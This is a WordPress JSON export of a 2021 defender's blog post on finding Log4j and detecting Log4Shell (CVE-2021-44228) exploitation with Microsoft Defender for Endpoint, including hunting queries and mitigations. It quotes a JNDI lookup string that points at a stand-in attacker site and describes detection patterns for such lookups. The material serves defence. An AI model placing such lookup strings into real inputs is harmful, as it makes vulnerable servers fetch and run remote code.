{"id":4077,"date":"2021-12-15T00:31:25","date_gmt":"2021-12-14T22:31:25","guid":{"rendered":"https:\/\/jeffreyappel.nl\/?p=4077"},"modified":"2021-12-17T00:26:04","modified_gmt":"2021-12-16T22:26:04","slug":"microsoft-defender-for-endpoint-log4j","status":"publish","type":"post","link":"https:\/\/jeffreyappel.nl\/microsoft-defender-for-endpoint-log4j\/","title":{"rendered":"Log4j and CVE-2021-44228: Use Microsoft Defender for Endpoint for software\/ threat investigation"},"content":{"rendered":"
One of the most important and trending topics of the last couple of days is Log4j, Log4Shell, and the associated CVE-2021-44228. A zero-day vulnerability (CVE-2021-44228<\/a>), publicly disclosed on 9 December 2021 and known as Log4j or Log4Shell, is actively being exploited in the wild. CVE-2021-44228 is rated critical with a risk score of 10. With this high rating it is important to take immediate action and patch vulnerable systems and software packages that include Log4j.<\/strong><\/p>\r\n Article updated 15 December 2021<\/strong><\/p>\r\n This blog covers Log4j \/ CVE-2021-44228 detection with Microsoft Defender for Endpoint (MDE). Also visit the Microsoft Security Response Center<\/a> blog for all the detailed information and possible detection use cases. See: Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j<\/a><\/p>\r\n The vulnerability CVE-2021-44228, referred to as Log4Shell, affects Java-based applications that use Log4j 2 versions 2.0 through 2.14.1. Log4j 2<\/a> is a Java-based logging library that is widely used, included in open-source libraries, and embedded in software applications. Because of this the scope is broad and includes thousands of software applications. Java is cross-platform and the library is used in many solutions. It is important to track affected applications and patch directly to the latest security updates. Read the application vendor's site for more details and available updates.<\/p>\r\n An example attack pattern would appear in a web request log with a string like the following: ${jndi:ldap:\/\/[attacker site]\/a}<\/p>\r\n The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface.<\/p>\r\n This blog will focus mostly on the Defender for Endpoint (MDE) side and not on an in-depth technical analysis of Log4j. 
Some recommended sources for more in-depth Log4j information:<\/p>\r\n Twitter<\/strong><\/p>\r\n The first step is getting insight into the application scope and the affected software packages and devices. With Microsoft Defender for Endpoint (MDE) it is possible to use the vulnerability and software data from Threat and Vulnerability Management (TVM).<\/p>\r\n To detect systems with Log4j components, use the Software Inventory data and search for a SoftwareName containing \u201clog4j\u201d. Log4j is the main component. Advanced Hunting is the most flexible way to build more advanced queries and combinations:<\/p>\r\n Use the query to discover where the software name contains Log4j<\/strong>.<\/p>\r\n\r\n Which gives the result:<\/p>\r\n <\/p>\r\n Software packages can embed the Log4j binary, which is difficult to discover. Multiple applications use the Log4j binary built in. To resolve the CVE, the vendor must release new patches.<\/p>\r\n For example, software such as the iCloud client (patched), Splunk<\/a>, vCenter<\/a>, and Logstash<\/a> is vulnerable in specific versions. See the NCSC-NL GitHub<\/a> for additional software information on more applications and vendors.<\/p>\r\n Microsoft is expanding TVM detection to include more applications. Detection is possible based on the TVM data and the CVE number. To detect vulnerable software, follow the steps below:<\/p>\r\n Advanced Hunting makes it easier to add more combinations based on MDE data. Below is a basic query for CVE-2021-44228 detection.<\/p>\r\n\r\n Which gives the result:<\/p>\r\n And applications in use that are not patched against CVE-2021-44228:<\/p>\r\n <\/p>\r\n Microsoft published a Threat Analytics report inside Microsoft Defender for Endpoint. The analytics report provides information in multiple tabs. 
To view the MDE analytics report:<\/p>\r\n From the threat analytics details, the related incidents, impacted assets, and more technical details are visible. The page contains the following details:<\/p>\r\n <\/p>\r\n Contains all incidents that are related to active Log4j exploitation:<\/p>\r\n Mitigations list the software packages that are vulnerable and detected by Microsoft. Part of the current CVE detection, for example:<\/p>\r\n An attacker performs an HTTP request against the target system, which generates a log entry using Log4j; that log entry leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to that site and execute the payload.<\/p>\r\n Important:<\/strong> attackers have added obfuscation to these requests, which makes many combinations possible. To try to bypass detections based on the request patterns, the following combinations with lower- or upper-case keywords are possible.<\/p>\r\n For tracking the process command lines, the Advanced Hunting queries below are useful:<\/p>\r\n Important:<\/strong> DeviceProcessEvents will not detect all of them<\/p>\r\n The Advanced Hunting query below shows the ProcessCommandLine for all events that contain jndi together with any of ldap, ldaps, HTTP, rmi, dns, or iiop<\/p>\r\n <\/p>\r\n It is recommended to use one of the available IOC lists and match the IOCs against the DeviceNetworkEvents data in MDE. See the NCSC-NL GitHub<\/a> for available IOC data sources.<\/p>\r\n More Advanced Hunting query examples<\/p>\r\n Defender for Endpoint has built-in detection rules that can trigger the following alerts, which can indicate threat activity:<\/p>\r\n In case of possible Log4j exploitation, the information below is visible directly in MDE. 
It is important to track the alerts with the title: Possible Log4j exploitation<\/p>\r\n Incident overview in MDE: <\/strong>Detected by detection source: EDR<\/p>\r\n Alert story: <\/strong>Contains the jndi:ldap:\/\/ string and detects possible Log4j exploitation.<\/p>\r\n When Microsoft Sentinel is connected to MDE, the following events are visible. A new blog is coming with more focus on Microsoft Sentinel and its detection options.<\/p>\r\n For the Microsoft Sentinel data connection, make sure the Defender connector is enabled. Enable one of the data connectors below and enable automatic alert creation.<\/p>\r\n During the enablement of the connector there is a checkbox for enabling Microsoft Defender for Endpoint alerts:<\/p>\r\n Defender for Endpoint connector:<\/strong><\/p>\r\n Microsoft 365 preview connector:<\/strong> Apply these mitigations to reduce the impact:<\/p>\r\n Log4j components<\/strong><\/p>\r\n OS<\/strong><\/p>\r\n Defender for Endpoint<\/strong><\/p>\r\n Important:<\/strong> Not all mitigations are listed. Read all the recommendations by Microsoft and other security vendors for the complete list of mitigations.<\/p>\r\n Don’t forget to read all the recommendations by Microsoft and other security vendors for mitigations, protections, and detection rules. This blog covers only the first steps based on Microsoft Defender for Endpoint and some of the functions that can help with the detection of Log4j using existing device data.<\/p>","protected":false},"excerpt":{"rendered":" One of the most important and trending topics in the last couple of days is related to Log4j, log4shell, and the attached CVE 2021-44228. 
A zero-day vulnerability (CVE-2021-44228), publicly released on 9 December 2021 and known as Log4j or Log4Shell,…<\/p>\n","protected":false},"author":1,"featured_media":4095,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[189],"tags":[219],"table_tags":[],"yoast_head":"\nWhy is Log4J, log4shell, CVE-2021-44228 important?<\/h2>\r\n
\r\nGet software TVM insights with Microsoft Defender for Endpoint<\/h2>\r\n
Detect systems with Log4j installed<\/h3>\r\n
\/\/Log4j found in the software inventory on endpoints\r\nDeviceTvmSoftwareInventory\r\n| where SoftwareName contains \"Log4j\"\r\n| project DeviceName, SoftwareName, SoftwareVersion<\/code><\/pre>\r\n\r\n
Detect software including Log4j and single Log4j packages<\/h3>\r\n
Advanced Hunting<\/strong><\/h3>\r\n
\/\/Software on endpoints that is vulnerable to CVE-2021-44228\r\nDeviceTvmSoftwareVulnerabilities\r\n| where CveId contains \"CVE-2021-44228\"\r\n| distinct DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion, RecommendedSecurityUpdate, RecommendedSecurityUpdateId<\/code><\/pre>\r\n\r\n
\r\nMicrosoft Defender for Endpoint Threat Analytics report<\/strong><\/h2>\r\n
Related incidents<\/h3>\r\n
Mitigations<\/h3>\r\n
\r\nProcess commands in Defender for Endpoint<\/h2>\r\n
Detect Process events<\/strong><\/h3>\r\n
IOC matching<\/h3>\r\n
\r\nDefender for Endpoint alerts<\/strong><\/h2>\r\n
Alert: Possible Log4j exploitation alert<\/strong><\/h3>\r\n
\r\nMicrosoft Sentinel<\/h3>\r\n
\r\nMitigations<\/h2>\r\n
\r\nConclusion<\/h2>\r\n